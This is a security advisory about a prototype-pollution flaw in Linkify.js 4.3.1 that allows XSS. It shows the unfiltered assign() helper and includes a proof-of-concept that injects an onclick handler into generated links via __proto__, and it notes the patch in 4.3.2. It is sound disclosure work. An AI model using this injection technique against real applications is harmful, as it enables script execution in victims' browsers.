Linkify 4.3.1 - Prototype Pollution & HTML Attribute Injection (XSS)

Description

Prototype Pollution in internal assign() helper in Linkify.js version 4.3.1 allows remote attackers to execute arbitrary JavaScript (Stored or Reflected XSS) via injection of event handlers through unfiltered proto property.

Vulnerability

Linkify.js is JavaScript library and ecosystem for automatically detecting links in text and converting them to HTML <a> elements.

The Linkify.js version 4.3.1 is vulnerable to Prototype Pollution via the internal assign() helper, which fails to filter __proto__.

An attacker can inject event handlers into every generated link, leading to Stored or Reflected XSS.

Insecure Merge

// packages/linkifyjs/src/assign.mjs
export default function assign(target, properties) {
  for (const key in properties) {
    target[key] = properties[key];
  }
  return target;
}

Prototype Pollution

By passing options.attributes.__proto__, the attacker writes to the new object’s prototype:

options.attributes = {
  __proto__: { onclick: "alert('XSS via PP')" }
};

Attribute Injection & XSS

Later, all enumerable keys (including inherited ones) are set on <a>:

for (const attr in attributes) {
  element.setAttribute(attr, attributes[attr]);
}

PoC

Exploit:

// poc-proto-xss.js
import linkifyHtml from 'linkify-html';

const opts = {
  attributes: {
    __proto__: {
      onclick: "alert('XSS via prototype pollution')"
    }
  }
};

console.log(
  linkifyHtml('victim.com', opts)
);
// <a href="http://victim.com" onclick="alert('XSS via prototype pollution')">victim.com</a>

Our security policy

We have reserved the ID CVE-2025-8101 to refer to this issue from now on.

Disclosure policy

System Information

• Linkify.js

• Version 4.3.1

• Operative System: Any

References

Github Repository: https://github.com/nfrasser/linkifyjs

Mitigation

Linkify version 4.3.2 has patched this vulnerability.

Credits

The vulnerability was discovered by Camilo Vera from Fluid Attacks' Offensive Team.